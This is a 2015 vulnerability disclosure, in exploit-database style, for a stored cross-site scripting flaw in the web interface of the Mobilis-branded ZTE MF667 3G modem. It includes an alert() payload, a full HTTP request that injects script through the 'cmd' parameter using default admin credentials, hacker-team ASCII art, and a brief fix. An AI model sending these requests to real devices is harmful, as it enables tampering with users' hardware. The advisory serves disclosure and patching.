###########################
#Exploit Title: # Mobilis 3g mobiconnect 3G++ Stored XSS vulnerability
#Date: 07/01/2015
#Author: kabanni kacily2008@gmail.com
#Product web page: http://www.3G.dz/   http://www.mobilis.dz/
#Version Of software WEB_MOBILISDZMF667V1.0.0B03 
#Version The firmware BD_HDW5MF667V1.0.0B01
#Version Equipment MF667-2.0.0
#Product & Service Introduction:
	http://www.zte.com.cn
	http://www.mobilis.dz/entreprises/mobiconnect.php
	http://www.3g.dz/fr/cle_mas/index.php?id_document=2
#Tested on:  WifiSlax  (Es)
###########################
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1                      ______                                          0
0                   .-"      "-.                                       1
1                  / HaChkerz_Dz  \ =-=-=-=-=-=-=-=-=-=-=-=|           0
0 Algerian HaCker |              | > Site : GDGBordj.org |             1
1 --------------- |,  .-.  .-.  ,| > fb : @kabanni       |             0
0                 | )(_o/  \o_)( | > kacily2008@gmail.com|             1
1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=-|             0
0       (@_       (_     ^^     _)  0X00 Team                          1
1  _     ) \_______\__|IIIIII|__/_______________________               0
0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1
1        )_/        \          /                                       0
0       (@           `--------`   2015, 0x00 Team                      1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0     Mobilis 3g mobiconnect 3G++ XSS vulnerability                    1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
##########################
# Sample Payload for Stored XSS: "<script>alert(0);</script> "

# Solution
Filter the input fields aganist to XSS attacks.

# code :
 GET /goform/goform_get_cmd_process?cmd=%3Cscript%3Ealert%28%27happy%20new%20year%27%29%3C/script%3E HTTP/1.1

Host: 192.168.0.1 Or http://m.home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ls_google_allow=1; ls_iserver_timestamp_bnc_bsaved=1414677822551; ctx1420m06d05=7b2273756363657777723a302c226c6f675f616374697665223a307d
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
    
# Attack details :
The variable cmd  has been set to simple payload <script>alert('happy new year')</script>

    --==[[ Greetz To ]]==--
############################################################################################
#0x00 , Alhack , Mr.elhdj Google , Hakim_Ghorb , Mohamed Ramaden , Team Anonymous .
#Mr.Zaki ,Dr.Ben Taleb,unKnown ,Dahmani,Good_person ,Boud_Sah ,Moh_Dz ,Yass_assasine.
#Amin-Biskra , Bouhlel ,Mr.Control, Najmo & All students TIC & Informatics at Msila_Msila

#############################################################################################
                             --==[[Love to]]==--
# My Father & Mother ,All Kacem(bira9i9) ,my Ex Teacher , My wife .
                       --==[[ All Muslims Hachers ]]==--
                            <3  0x00 Team <3